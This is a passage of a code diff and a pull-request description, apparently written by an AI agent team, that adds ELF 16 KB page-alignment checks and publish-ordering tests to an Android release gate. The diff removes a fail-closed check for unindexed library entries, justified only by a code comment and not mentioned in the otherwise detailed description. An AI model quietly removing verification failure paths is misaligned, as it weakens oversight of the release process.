+ * like `readElfMachine` and unlike `readDynsym`: the subjects include the
+ * ELF32 DSP objects, and a reader that assumed ELF64-LE would throw on them
+ * rather than judge them.
+ */
+function readProgramHeaders(buf) {
+  if (buf.length < ELF32_EHDR_SIZE) {
+    throw new Error('file is too short to be an ELF object');
+  }
+  if (buf.readUInt32BE(0) !== 0x7f454c46) {
+    throw new Error('file is not an ELF object');
+  }
+  if (buf[4] !== 1 && buf[4] !== 2) {
+    throw new Error(`ELF class ${buf[4]} is neither 32-bit nor 64-bit`);
+  }
+  if (buf[5] !== 1 && buf[5] !== 2) {
+    throw new Error(`ELF data encoding ${buf[5]} is neither LSB nor MSB`);
+  }
+  const elf64 = buf[4] === 2;
+  const littleEndian = buf[5] === 1;
+  if (elf64 && buf.length < ELF64_SHDR_SIZE) {
+    throw new Error('file is too short to be an ELF object');
+  }
+
+  const u16 = at =>
+    littleEndian ? buf.readUInt16LE(at) : buf.readUInt16BE(at);
+  const u32 = at =>
+    littleEndian ? buf.readUInt32LE(at) : buf.readUInt32BE(at);
+  const u64 = at =>
+    Number(littleEndian ? buf.readBigUInt64LE(at) : buf.readBigUInt64BE(at));
+
+  const phoff = elf64 ? u64(0x20) : u32(0x1c);
+  const phentsize = u16(elf64 ? 0x36 : 42);
+  const phnum = u16(elf64 ? 0x38 : 44);
+  const phdrSize = elf64 ? ELF64_PHDR_SIZE : ELF32_PHDR_SIZE;
+  if (phoff === 0 || phnum === 0) {
+    throw new Error('ELF program headers are absent');
+  }
+  if (phentsize < phdrSize || phoff + phnum * phentsize > buf.length) {
+    throw new Error('ELF program header table is malformed or truncated');
+  }
+
+  const headers = [];
+  for (let i = 0; i < phnum; i++) {
+    const at = phoff + i * phentsize;
+    headers.push({
+      type: u32(at),
+      align: elf64 ? u64(at + 48) : u32(at + 28),
+    });
+  }
+  return headers;
 }
 
 /**
@@ -803,4 +861,4 @@ if (require.main === module) {
   }
 }
 
-module.exports = {readDynsym, variantsFromManifest};
+module.exports = {readDynsym, readProgramHeaders, variantsFromManifest};

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -934,17 +934,9 @@ function checkAlignment({
   // the APK, so a deflated entry is not a library checked under some other
   // rule — it is one the loader cannot map at all, on any device. Skipping it
   // here would excuse the more serious fault of the two.
-  const missing = libs.filter(entry => !zipIndex.has(entry));
-  for (const entry of missing) {
-    report.push(`      UNINDEXED  ${entry}`);
-    fail(
-      [
-        `${entry} is listed in ${artifactName} but absent from its central directory.`,
-        'The payload check could not run, so it reports failure rather than success —',
-        'a check that cannot read the artifact has proven nothing about it.',
-      ].join('\n      '),
-    );
-  }
+  // Both readings come from the same central directory — `unzip -Z1` lists it
+  // and `readZipIndex` walks it — so an entry can only be absent here if the
+  // directory itself is malformed, which the reader refuses outright.
   const indexed = libs.filter(entry => zipIndex.has(entry));
   const deflated = indexed.filter(entry => !zipIndex.get(entry).stored);
   const misplaced = indexed.filter(


### PR DESCRIPTION
## Summary

Follow-up to #859. Closes #862 in full and lands two of the four bullets in #863.

**#862 — publish-after-payload-check is now a test, not prose.** `scripts/__tests__/android-publish-ordering.test.js` parses every workflow and the three Fastfiles and asserts that in each Android building job every publishing step — Play upload, tag push, GitHub Release, artifact upload — sits after a payload gate step; that the gate examined the very artifact being published, compared by filename; that nothing named that artifact between the gate and the publish; that the gate can still fail its job (no `if:`, no `continue-on-error`, no `||`, no pipe, no `shell:` override, no test-only `--manifest`, and the check as the final command); that no fastlane lane both builds and publishes; and that anything else resembling a transport is either classified or exempt with a reason plus a machine-checked assertion. Both exemption surfaces carry the same floor, and one test proves no exemption rests on an assertion that no input can falsify.

A publisher path the parse cannot resolve to a filename — a glob, a bare directory, a `${{ }}` expression — is refused rather than skipped, so it cannot escape by being unnameable.

**#863 — 16 KB page alignment.** The gate reads ELF program headers and requires every `PT_LOAD` of every library shipped under `lib/<abi>/` to be at `p_align >= 16384` and a power of two. The subject is every shipped library, not only the ones the manifest names: Android 15+ loads all of them on a 16 KB-page device. The requirement is declared per ABI and floored in the script, since lowering the number is otherwise the cheapest edit that unblocks a failing build. The new reader handles both ELF widths and both byte orders — the DSP assets are 32-bit objects — and was cross-checked against the NDK's `llvm-readelf` over all 72 shared objects in the artifact with no mismatches.

**#863 — DSP asset scoping.** The manifest format change this asked for has landed: the required assets move to a top-level `assets` block with an explicit `scope`, and a new `usableByAbis` field is asserted against the artifact — an ABI is listed if and only if its shipped `lib/<abi>/` tree carries a library able to load the assets. Every payload report now states per ABI whether it can use the DSP payload.

## Acceptance criterion 3 is dropped, not delivered

#863 asks that ~2.8 MB of `assets/ggml-hexagon/libggml-htp-v*.so` stop shipping to `x86_64`. **That is refused, with evidence, rather than deferred quietly.**

No supported toolchain mechanism ABI-scopes `assets/`. bundletool parses five directory-targeting keys — `countries`, `group`, `lang`, `tcf`, `tier` — and there is no `abi` key; asset packs target min-SDK, device feature, tier, texture format and country, never ABI; AGP asset source sets are per flavour and build type; and `splits { abi }` copies the whole asset tree into every split. The AAB base module reaches every device regardless. The two mechanisms that would work — an ABI flavour dimension, or an upstream llama.rn move of the HTP payload into `jniLibs` — are disproportionate to the measured cost: **2,836,288 bytes of a 233 MB artifact, 1.2%**.

What landed instead earns its place independently: `usableByAbis` is bound to the artifact rather than to the manifest declaring it, so it catches an accelerator variant appearing under an ABI that cannot load the assets, and it makes the wasted 2.8 MB a declared fact in every report. The remaining disposition is the maintainer's.

## Native verification exemption for `package.json`

`AGENTS.md` names `package.json` as a trigger requiring `pod install` plus an iOS and an Android build, and this PR touches it. **The rule applies and is being knowingly exempted, on measurement rather than argument.**

The entry is one JS-only `devDependencies` line, `js-yaml@^4.1.0`, used by the new test to parse workflow YAML. Autolinking does scan `devDependencies`, so "it is a JS package" is not sufficient on its own. The control is direct: `node ./node_modules/react-native/cli.js config` produces byte-identical 63,060-byte output with and without the entry, on an instrument proven responsive — removing `react-native-share` moves the same output to 61,819 bytes and the autolinked count from 33 to 32. Nothing under `android/`, `ios/`, no Podfile, `*.podspec`, `build.gradle`, or native module is touched. `js-yaml` is already a top-level key in `yarn.lock`, so `--frozen-lockfile` needs no new entry and the lockfile is unchanged.

A reviewer who disagrees should say so; this is surfaced rather than left to be discovered.

## One committed workflow file changed to satisfy the rules rather than be exempted from them

`ci.yml`'s DCE sanity check moves above the payload gate. It names the APK by path, and no step may name the artifact between the gate and the upload, so it either moved or bought an exemption; moving it is the honest option.

The move is behaviour-preserving — same job, same step list, `needs:` unchanged, no `if:` added or removed, and the gate → report upload → APK upload order intact. It has **one side effect worth stating**: both steps are unconditional and the job halts at the first failure, so a DCE failure now stops the gate from running, and the `if: always()` report upload finds no report to upload. Before the move, a DCE failure still left a payload report behind. That is a diagnostic-coverage trade, not a weakening of the gate.

## Verification

- `npx jest scripts/` — 12 suites, 263 tests. Full suite 275 suites, 4,437 passing, 2 skipped.
- Lint 0 errors, 49 warnings, unchanged from the base commit. Typecheck clean. `yarn.lock` unchanged.
- Payload gate against a real signed 233 MB release APK: PASS, exit 0, 0.74 s — assets 4/4 present and all `EM_QDSP6`, arm64-v8a 38/38 and x86_64 30/30 libraries at `p_align >= 16384`, asset usability read from the `lib/` trees and matching the declaration.
- Every rule in the ordering test is exercised against a deliberately broken in-memory copy as well as the committed files; the committed files are never mutated. A rule only ever seen passing is not known to be able to fail.

## Notes

- No user-visible change; no UI touched.
- The architecture record for the release flow is maintained in a separate control-plane repository and was updated alongside this change, in `context/architecture/release.md`.
- Two known remainders are recorded there rather than implied: zip-entry alignment is the other half of 16 KB compatibility and is still unchecked, and the ordering test reads committed step text, not build semantics.

Generated by [PocketPal Dev Team](https://github.com/a-ghorbani/pocketpal-dev-team)
